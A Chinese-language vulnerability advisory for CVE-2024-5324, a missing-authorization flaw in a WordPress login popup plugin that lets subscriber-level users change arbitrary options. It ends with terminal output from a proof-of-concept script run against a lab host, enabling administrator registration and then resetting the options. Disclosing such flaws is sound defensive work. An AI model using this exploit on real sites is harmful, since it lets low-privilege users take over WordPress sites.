登录/注册弹窗(内联表单 + Woocommerce)2.7.1 - 2.7.2 - 缺少授权导致任意选项更新
WordPress 的 Login/Signup Popup ( Inline Form + Woocommerce ) 插件在 2.7.1 至 2.7.2 版本中,由于 'import_settings' 函数缺少权限检查,容易受到未经授权的数据修改。这使得经过身份验证的攻击者(具有订阅者级别及更高级别的访问权限)能够更改受影响站点上的任意选项。这可用于启用新用户注册,并将新用户的默认角色设置为管理员。
Severity: high
CVE ID: CVE-2024-5324
CVSS Score: 8.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: easy-login-woocommerce
WPScan URL: https://www.wpscan.com/plugin/easy-login-woocommerce
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=api-prod
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user on the as a admin.
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test --fix e
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Options reset to default